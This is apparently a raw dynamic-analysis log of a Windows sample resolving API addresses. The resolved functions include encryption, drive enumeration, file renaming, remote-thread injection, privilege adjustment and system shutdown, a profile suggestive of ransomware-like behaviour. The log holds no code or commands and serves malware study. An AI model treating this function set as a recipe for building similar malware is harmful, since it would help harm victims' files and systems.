Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
